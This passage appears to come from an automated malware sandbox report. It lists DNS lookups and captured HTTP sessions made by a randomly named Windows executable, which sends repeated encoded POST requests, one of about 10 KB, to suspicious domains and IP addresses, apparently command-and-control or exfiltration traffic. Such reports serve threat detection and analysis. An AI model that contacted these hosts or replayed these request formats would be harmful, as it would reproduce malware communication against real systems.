Jul 5, 2024 03:25:30.981237888 CEST	52597	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:25:31.016417027 CEST	53	52597	1.1.1.1	192.168.2.4
Jul 5, 2024 03:25:39.168880939 CEST	58934	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:25:39.511290073 CEST	53	58934	1.1.1.1	192.168.2.4
Jul 5, 2024 03:25:52.794764042 CEST	52020	53	192.168.2.4	1.1.1.1
Jul 5, 2024 03:25:53.483297110 CEST	53	52020	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 5, 2024 03:22:19.201766014 CEST	192.168.2.4	1.1.1.1	0x5f2f	Standard query (0)	www.778981.com	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:22:36.138011932 CEST	192.168.2.4	1.1.1.1	0x4e01	Standard query (0)	www.binpvae.lol	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:10.559772015 CEST	192.168.2.4	1.1.1.1	0xfbf2	Standard query (0)	www.byteffederal.com	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:18.781533957 CEST	192.168.2.4	1.1.1.1	0x2fcb	Standard query (0)	www.jjkelker.com	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:26.872267008 CEST	192.168.2.4	1.1.1.1	0xcedb	Standard query (0)	www.a9jcpf.top	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:41.059914112 CEST	192.168.2.4	1.1.1.1	0xb99f	Standard query (0)	www.mhtnvro.lol	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:24:15.482251883 CEST	192.168.2.4	1.1.1.1	0xbec6	Standard query (0)	www.lexiecos.top	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:24:29.236759901 CEST	192.168.2.4	1.1.1.1	0x5a3a	Standard query (0)	www.augaqfp.lol	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:25:03.817570925 CEST	192.168.2.4	1.1.1.1	0x31aa	Standard query (0)	www.webuyfontana.com	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:25:17.062087059 CEST	192.168.2.4	1.1.1.1	0x3fae	Standard query (0)	www.ytw6.top	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:25:30.981237888 CEST	192.168.2.4	1.1.1.1	0x5d32	Standard query (0)	www.caroinapottery.com	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:25:39.168880939 CEST	192.168.2.4	1.1.1.1	0x40bd	Standard query (0)	www.hsck520.com	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:25:52.794764042 CEST	192.168.2.4	1.1.1.1	0x17e9	Standard query (0)	www.mebutnotme.store	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jul 5, 2024 03:22:20.170419931 CEST	1.1.1.1	192.168.2.4	0x5f2f	No error (0)	www.778981.com	xjc-g1171-6-g-1584411309302y.onlinename11txcnddns.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2024 03:22:20.170419931 CEST	1.1.1.1	192.168.2.4	0x5f2f	No error (0)	xjc-g1171-6-g-1584411309302y.onlinename11txcnddns.com	g1171-6-g-1584411309302y.greycdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2024 03:22:20.170419931 CEST	1.1.1.1	192.168.2.4	0x5f2f	No error (0)	g1171-6-g-1584411309302y.greycdn.net	c96e98f1fy.greycdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2024 03:22:20.170419931 CEST	1.1.1.1	192.168.2.4	0x5f2f	No error (0)	c96e98f1fy.greycdn.net	7a4ca695fd164z.greycdn.net		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2024 03:22:20.170419931 CEST	1.1.1.1	192.168.2.4	0x5f2f	No error (0)	7a4ca695fd164z.greycdn.net		165.154.0.120	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:22:36.476174116 CEST	1.1.1.1	192.168.2.4	0x4e01	No error (0)	www.binpvae.lol		116.213.43.190	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:10.693478107 CEST	1.1.1.1	192.168.2.4	0xfbf2	Name error (3)	www.byteffederal.com	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:18.811526060 CEST	1.1.1.1	192.168.2.4	0x2fcb	Name error (3)	www.jjkelker.com	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:27.372152090 CEST	1.1.1.1	192.168.2.4	0xcedb	No error (0)	www.a9jcpf.top	kmdne.ajunsdfancsda.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2024 03:23:27.372152090 CEST	1.1.1.1	192.168.2.4	0xcedb	No error (0)	kmdne.ajunsdfancsda.com	aj.ajunsdfancsda.com		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2024 03:23:27.372152090 CEST	1.1.1.1	192.168.2.4	0xcedb	No error (0)	aj.ajunsdfancsda.com		147.92.36.231	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:27.372152090 CEST	1.1.1.1	192.168.2.4	0xcedb	No error (0)	aj.ajunsdfancsda.com		147.92.36.233	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:27.372152090 CEST	1.1.1.1	192.168.2.4	0xcedb	No error (0)	aj.ajunsdfancsda.com		45.126.181.242	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:27.372152090 CEST	1.1.1.1	192.168.2.4	0xcedb	No error (0)	aj.ajunsdfancsda.com		147.92.36.232	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:27.372152090 CEST	1.1.1.1	192.168.2.4	0xcedb	No error (0)	aj.ajunsdfancsda.com		207.148.37.252	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:27.372152090 CEST	1.1.1.1	192.168.2.4	0xcedb	No error (0)	aj.ajunsdfancsda.com		147.92.38.243	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:27.372152090 CEST	1.1.1.1	192.168.2.4	0xcedb	No error (0)	aj.ajunsdfancsda.com		45.126.181.243	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:23:41.412219048 CEST	1.1.1.1	192.168.2.4	0xb99f	No error (0)	www.mhtnvro.lol		116.213.43.190	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:24:15.854705095 CEST	1.1.1.1	192.168.2.4	0xbec6	No error (0)	www.lexiecos.top		203.161.55.102	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:24:29.608244896 CEST	1.1.1.1	192.168.2.4	0x5a3a	No error (0)	www.augaqfp.lol		116.213.43.190	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:25:03.830343008 CEST	1.1.1.1	192.168.2.4	0x31aa	No error (0)	www.webuyfontana.com		13.248.169.48	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:25:03.830343008 CEST	1.1.1.1	192.168.2.4	0x31aa	No error (0)	www.webuyfontana.com		76.223.54.146	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:25:17.421808004 CEST	1.1.1.1	192.168.2.4	0x3fae	No error (0)	www.ytw6.top	ytw6.top		CNAME (Canonical name)	IN (0x0001)	false
Jul 5, 2024 03:25:17.421808004 CEST	1.1.1.1	192.168.2.4	0x3fae	No error (0)	ytw6.top		38.47.232.224	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:25:31.016417027 CEST	1.1.1.1	192.168.2.4	0x5d32	Name error (3)	www.caroinapottery.com	none	none	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:25:39.511290073 CEST	1.1.1.1	192.168.2.4	0x40bd	No error (0)	www.hsck520.com		35.190.52.58	A (IP address)	IN (0x0001)	false
Jul 5, 2024 03:25:53.483297110 CEST	1.1.1.1	192.168.2.4	0x17e9	Name error (3)	www.mebutnotme.store	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.778981.com

www.binpvae.lol

www.a9jcpf.top

www.mhtnvro.lol

www.lexiecos.top

www.augaqfp.lol

www.webuyfontana.com

www.ytw6.top

www.hsck520.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	52649	165.154.0.120	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:22:20.185132980 CEST	488	OUT	GET /p1dd/?MXOD=nDFLlbM87h&9TND4h=G7DDmCfNGXy3uJCEgcIIU1iXFvarFYWbvsRS9sxoYaNScQyM2A1goKEbo8KV9mX8trrejs5AH6YGa7AwDEXag2zD7gw0a+PZJfygUURv+5LCwJWR5NAeUOI= HTTP/1.1 Host: www.778981.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Jul 5, 2024 03:22:21.092497110 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 05 Jul 2024 01:22:20 GMT Content-Type: text/html; charset=utf-8 Content-Length: 3915 Connection: close Last-Modified: Thu, 13 Jun 2024 18:55:23 GMT Vary: Accept-Encoding ETag: "666b409b-f4b" Accept-Ranges: bytes Data Raw: ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e8 af 9a e4 bf a1 e5 ae 89 e5 85 a8 ef bc 8c e8 b6 85 e5 87 a1 e4 bd 93 e9 aa 8c 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 62 61 73 65 20 68 72 65 66 3d 22 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 73 74 79 6c 65 73 2e 37 66 65 32 33 65 65 61 65 65 31 39 31 31 35 32 32 35 64 39 2e 63 73 73 22 3e 3c 2f 68 65 61 64 3e 0a 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 61 70 70 2d 72 6f 6f 74 3e 3c 2f 61 70 70 2d 72 6f 6f 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8" /> <title></title> <base href="/" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <link rel="stylesheet" href="styles.7fe23eeaee19115225d9.css"></head> <body> <app-root></app-root> <script src="https://v-cn.vaptcha.com/v3.js" async defer></script> ... Start of LiveChat (www.livechat.com) code --> <script> if (document.domain.includes('hs246.com') \|\| document.domain.includes('xjc893.com')) { window.__lc = window.__lc \|\| {} window.__lc.license = 14282961 ;(function (n, t, c) { function i(n) { return e._h ? e._h.apply(null, n) : e._q.push(n) } var e = { _q: [], _h: null, _v: '2.0', on: function () { i(['on', c.call(arguments)]) }, once: function () {
Jul 5, 2024 03:22:21.092509031 CEST	224	IN	Data Raw: 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 28 5b 27 6f 6e 63 65 27 2c 20 63 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 5d 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 20 20 20 20 6f 66 66 3a 20 66 75 6e 63 Data Ascii: i(['once', c.call(arguments)]) }, off: function () { i(['off', c.call(arguments)]) }, get: function () { if (!e._h) throw new Error("
Jul 5, 2024 03:22:21.092519045 CEST	1236	IN	Data Raw: 5b 4c 69 76 65 43 68 61 74 57 69 64 67 65 74 5d 20 59 6f 75 20 63 61 6e 27 74 20 75 73 65 20 67 65 74 74 65 72 73 20 62 65 66 6f 72 65 20 6c 6f 61 64 2e 22 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 69 28 5b 27 67 65 74 Data Ascii: [LiveChatWidget] You can't use getters before load.") return i(['get', c.call(arguments)]) }, call: function () { i(['call', c.call(arguments)]) }, init: function () {
Jul 5, 2024 03:22:21.092612028 CEST	1236	IN	Data Raw: 3a 20 27 32 2e 30 27 2c 0a 20 20 20 20 20 20 20 20 20 20 6f 6e 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 69 28 5b 27 6f 6e 27 2c 20 63 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 5d 29 0a 20 20 20 20 Data Ascii: : '2.0', on: function () { i(['on', c.call(arguments)]) }, once: function () { i(['once', c.call(arguments)]) }, off: function () { i(['off', c.call(argument
Jul 5, 2024 03:22:21.092622042 CEST	248	IN	Data Raw: 63 72 69 70 74 20 73 72 63 3d 22 70 6f 6c 79 66 69 6c 6c 73 2d 65 73 35 2e 66 34 61 39 39 64 35 31 65 65 61 37 66 32 63 37 35 34 61 65 2e 6a 73 22 20 6e 6f 6d 6f 64 75 6c 65 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 70 Data Ascii: cript src="polyfills-es5.f4a99d51eea7f2c754ae.js" nomodule></script><script src="polyfills.7033c6f4843a0f0135c9.js"></script><script src="scripts.5e45ff3d9a5f89eacb48.js"></script><script src="main.259892d8df6d082d7c24.js"></script></body></h

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	52650	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:22:36.484947920 CEST	751	OUT	POST /kfqo/ HTTP/1.1 Host: www.binpvae.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.binpvae.lol Referer: http://www.binpvae.lol/kfqo/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4e 6e 70 74 34 4c 63 69 39 59 44 36 6f 74 7a 43 42 4c 67 71 74 32 70 78 59 36 58 41 35 71 79 75 6c 48 44 64 31 49 36 6e 44 4d 51 65 6d 34 70 57 4f 59 31 35 37 4c 59 70 78 30 50 54 51 63 73 48 6d 5a 34 4c 6a 4c 6a 43 2b 70 78 77 4d 77 42 77 52 55 32 6d 54 59 50 66 73 6e 69 45 4f 47 2f 47 4e 73 6f 62 63 38 2b 44 49 31 74 6b 55 69 58 32 70 78 54 56 61 4e 75 54 39 72 2b 58 35 4c 34 58 74 6f 74 6f 73 34 48 4a 4c 67 4a 46 67 45 47 6e 4c 57 5a 61 43 49 38 34 66 57 4e 51 56 55 6e 78 4a 6b 51 6f 41 41 35 4d 72 6a 41 6a 35 48 50 4f 57 49 31 68 4c 77 3d 3d Data Ascii: 9TND4h=Agm9T7DKMA28Nnpt4Lci9YD6otzCBLgqt2pxY6XA5qyulHDd1I6nDMQem4pWOY157LYpx0PTQcsHmZ4LjLjC+pxwMwBwRU2mTYPfsniEOG/GNsobc8+DI1tkUiX2pxTVaNuT9r+X5L4Xtotos4HJLgJFgEGnLWZaCI84fWNQVUnxJkQoAA5MrjAj5HPOWI1hLw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	52651	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:22:39.023005009 CEST	771	OUT	POST /kfqo/ HTTP/1.1 Host: www.binpvae.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.binpvae.lol Referer: http://www.binpvae.lol/kfqo/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4d 48 35 74 36 6f 6b 69 73 6f 44 39 6e 4e 7a 43 50 72 67 75 74 32 6c 78 59 2f 32 62 35 63 71 75 6c 6a 48 64 30 4a 36 6e 43 4d 51 65 75 59 70 5a 4b 59 31 79 37 4c 46 55 78 77 50 54 51 66 51 48 6d 62 67 4c 6a 36 6a 64 2b 35 78 79 58 67 42 32 56 55 32 6d 54 59 50 66 73 6e 32 2b 4f 48 62 47 4e 64 59 62 65 59 53 41 42 56 74 6e 54 69 58 32 2b 42 54 5a 61 4e 75 74 39 71 69 74 35 4a 77 58 74 73 6c 6f 73 70 48 4f 65 51 4a 4c 75 6b 48 6c 42 32 30 43 4f 4b 4a 32 48 33 4e 52 4b 6c 6a 64 42 43 42 79 52 78 59 62 35 6a 6b 51 6b 41 47 36 62 4c 49 6f 51 2b 46 62 42 6f 4b 48 30 65 32 30 6b 57 30 77 4f 65 6d 61 56 2f 45 3d Data Ascii: 9TND4h=Agm9T7DKMA28MH5t6okisoD9nNzCPrgut2lxY/2b5cquljHd0J6nCMQeuYpZKY1y7LFUxwPTQfQHmbgLj6jd+5xyXgB2VU2mTYPfsn2+OHbGNdYbeYSABVtnTiX2+BTZaNut9qit5JwXtslospHOeQJLukHlB20COKJ2H3NRKljdBCByRxYb5jkQkAG6bLIoQ+FbBoKH0e20kW0wOemaV/E=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	52652	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:22:41.598918915 CEST	10853	OUT	POST /kfqo/ HTTP/1.1 Host: www.binpvae.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.binpvae.lol Referer: http://www.binpvae.lol/kfqo/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 10303 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 41 67 6d 39 54 37 44 4b 4d 41 32 38 4d 48 35 74 36 6f 6b 69 73 6f 44 39 6e 4e 7a 43 50 72 67 75 74 32 6c 78 59 2f 32 62 35 63 69 75 6c 51 50 64 31 71 69 6e 59 4d 51 65 6b 34 70 61 4b 59 31 76 37 4c 63 66 78 77 44 44 51 5a 63 48 67 4f 30 4c 68 49 62 64 30 35 78 79 65 41 42 33 52 55 32 33 54 59 65 58 73 6e 6d 2b 4f 48 62 47 4e 65 41 62 4e 73 2b 41 48 56 74 6b 55 69 58 4d 70 78 54 31 61 4a 37 57 39 71 6d 39 36 35 51 58 74 4e 5a 6f 6a 37 2f 4f 63 77 4a 65 74 6b 48 48 42 32 34 6a 4f 4b 56 4d 48 33 34 30 4b 6c 58 64 43 47 67 6c 4a 30 34 62 6a 67 41 31 35 52 53 45 58 4c 45 64 49 70 31 66 52 74 65 4f 75 36 36 70 2b 32 70 33 5a 74 6e 65 58 70 2f 6f 46 47 77 76 38 4b 62 32 6c 42 5a 66 49 73 6a 49 78 55 43 42 44 79 2f 47 4e 36 35 41 4f 61 72 46 45 55 2f 79 54 44 4c 2f 58 52 72 39 30 71 34 39 4d 4f 74 52 4b 55 66 55 48 30 54 61 56 62 5a 50 46 4f 77 70 6c 49 72 7a 43 41 63 49 77 31 44 54 6d 68 74 65 53 68 76 61 5a 72 2f 36 78 34 62 35 52 72 5a 6c 33 56 77 42 76 74 39 45 76 63 63 57 39 68 33 [TRUNCATED] Data Ascii: 9TND4h=Agm9T7DKMA28MH5t6okisoD9nNzCPrgut2lxY/2b5ciulQPd1qinYMQek4paKY1v7LcfxwDDQZcHgO0LhIbd05xyeAB3RU23TYeXsnm+OHbGNeAbNs+AHVtkUiXMpxT1aJ7W9qm965QXtNZoj7/OcwJetkHHB24jOKVMH340KlXdCGglJ04bjgA15RSEXLEdIp1fRteOu66p+2p3ZtneXp/oFGwv8Kb2lBZfIsjIxUCBDy/GN65AOarFEU/yTDL/XRr90q49MOtRKUfUH0TaVbZPFOwplIrzCAcIw1DTmhteShvaZr/6x4b5RrZl3VwBvt9EvccW9h3qCQguCSkHF/sRQyUPc/7k0hL6pai5fZHjm3vUcFVEkCtU2ZUshffr8dKRxUavw0g4X8mqB3jyjwAfCA8pcBVY0Rg6PBz/5vrWf0ataoZ2RWbYRn98XXzRzkAeQGryFeLmN9OFVaeepFDB95i0fLmaNsatK+sQxM/nFUuiJeOAl0iHPhh+kGIpH9wLzStA7iNZ07PEgkkXbYMHVZ3mn+JCgT8wvqdnpkScgzjxBCPlRk+CkHnT3O31ALVGGN2P8FKB0s+XySLPtJj4GF3JXVT7zaEbWHFX3eCpdS2W6eBlgsejNYgZhtCi9SNqDfDY7LEXc/QHvslaq1BggdVoH6eXxW4AF01dQMgJZNiBVRq6X7gvIySW26pvTS2rq+DiDM1Xh0HK+kml8Gp/Hoai4fa8TxaY59R2VO8DBJxSi9WYiXO8X7ks8WVfS44r40/dljmZUdxl4IYYEHF1H0MVkKmiCKcjHC9zlgfOGLDDQHghWZ/EJ35+JjgmUuuGytcCzIGnYgdfP6YTzXnO0RG11lOBJGxlv5qma5fNV0EKsrEvs6QrmV22bx8yM1RIP+51OpC915izKRT609QOOy/RIvINdyLe7ZtNVL/y3IfNZpAMvyPzL28JIZEHKV0F3lDiZt64ncCKQ4S+oWbESJGoMGWRJCJKC5nGOsCmj [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	52653	116.213.43.190	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:22:44.137161016 CEST	489	OUT	GET /kfqo/?9TND4h=NiOdQOuMLD2zHgMWwKws4JzuutDmLpx3tWxYTf2s7ZGupi3Uz5m5Dts89dE7D44P7JMDqAvEJ+8u+Llyo4b9pPx+fjdmUm+qFImntH+EZRPwIZM2dcS4AHM=&MXOD=nDFLlbM87h HTTP/1.1 Host: www.binpvae.lol Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	52655	147.92.36.231	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:23:27.380572081 CEST	748	OUT	POST /1kbe/ HTTP/1.1 Host: www.a9jcpf.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.a9jcpf.top Referer: http://www.a9jcpf.top/1kbe/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 203 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 67 62 34 2f 56 4d 6b 59 78 2b 52 65 52 64 78 79 35 47 76 75 32 66 33 6d 59 59 4c 4f 38 67 74 42 6f 5a 4d 71 2b 6e 35 42 4d 73 30 31 6b 68 56 2f 6e 6c 30 45 5a 67 59 55 73 78 6c 6b 78 6e 34 76 53 69 76 64 58 67 78 77 69 49 43 57 76 54 4f 4f 73 67 62 51 6e 36 43 4f 70 63 69 43 75 33 6e 52 78 4a 30 34 36 61 73 4d 51 45 31 6e 68 78 6a 35 49 4f 68 7a 2f 6f 43 4e 44 34 6c 6f 6a 4f 66 63 2b 34 38 34 36 30 4c 78 30 62 4d 44 6b 49 6b 47 76 58 38 6b 75 33 5a 67 75 4f 35 7a 4a 73 59 46 7a 50 56 46 56 65 6f 50 36 58 4c 6a 4a 6a 49 61 4f 32 71 76 43 50 62 30 35 66 39 32 50 34 35 4a 57 77 3d 3d Data Ascii: 9TND4h=gb4/VMkYx+ReRdxy5Gvu2f3mYYLO8gtBoZMq+n5BMs01khV/nl0EZgYUsxlkxn4vSivdXgxwiICWvTOOsgbQn6COpciCu3nRxJ046asMQE1nhxj5IOhz/oCND4lojOfc+48460Lx0bMDkIkGvX8ku3ZguO5zJsYFzPVFVeoP6XLjJjIaO2qvCPb05f92P45JWw==
Jul 5, 2024 03:23:28.318110943 CEST	208	IN	HTTP/1.1 530 Date: Fri, 05 Jul 2024 01:23:28 GMT Content-Type: text/html;charset=utf-8 Transfer-Encoding: chunked Connection: close Server: cdn Data Raw: 32 63 0d 0a e2 9e a1 ef b8 8f e5 bd 93 e5 89 8d e8 ae bf e9 97 ae e7 9a 84 e8 8a 82 e7 82 b9 ef bc 9a 31 34 37 2e 39 32 2e 33 36 2e 32 33 31 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 2c147.92.36.231 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	52656	147.92.36.231	80	980	C:\Program Files (x86)\wyhexRQvvsUNbykgmUZEyCDIVqvoVFvXanvNWKmivskHrhUeeNqur\KWyVcOvVIsFTpZOKF.exe

Timestamp	Bytes transferred	Direction	Data
Jul 5, 2024 03:23:29.912993908 CEST	768	OUT	POST /1kbe/ HTTP/1.1 Host: www.a9jcpf.top Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate, br Origin: http://www.a9jcpf.top Referer: http://www.a9jcpf.top/1kbe/ Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Content-Length: 223 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36 Data Raw: 39 54 4e 44 34 68 3d 67 62 34 2f 56 4d 6b 59 78 2b 52 65 51 35 31 79 2f 6e 76 75 7a 2f 33 6e 53 34 4c 4f 32 41 74 2f 6f 5a 49 71 2b 6c 55 5a 4d 35 6b 31 6b 42 46 2f 6d 6e 63 45 61 67 59 55 34 68 6c 6c 75 33 35 43 53 69 6a 6a 58 6c 52 77 69 49 2b 57 76 53 2b 4f 73 7a 7a 50 6d 71 43 4d 79 73 69 41 6a 58 6e 52 78 4a 30 34 36 62 4a 5a 51 41 68 6e 69 45 72 35 4c 76 68 77 38 6f 43 4b 54 6f 6c 6f 79 65 66 51 2b 34 38 65 36 77 72 49 30 5a 30 44 6b 4e 59 47 76 47 38 6c 33 48 5a 69 71 4f 34 7a 49 5a 46 4a 38 74 41 47 62 39 73 58 7a 30 6d 65 42 46 5a 41 66 48 4c 34 51 50 2f 48 6b 59 30 43 43 37 45 41 4e 38 4b 63 42 57 54 61 2f 35 46 55 4c 52 4b 4f 55 6f 4a 41 33 67 63 3d Data Ascii: 9TND4h=gb4/VMkYx+ReQ51y/nvuz/3nS4LO2At/oZIq+lUZM5k1kBF/mncEagYU4hllu35CSijjXlRwiI+WvS+OszzPmqCMysiAjXnRxJ046bJZQAhniEr5Lvhw8oCKToloyefQ+48e6wrI0Z0DkNYGvG8l3HZiqO4zIZFJ8tAGb9sXz0meBFZAfHL4QP/HkY0CC7EAN8KcBWTa/5FULRKOUoJA3gc=
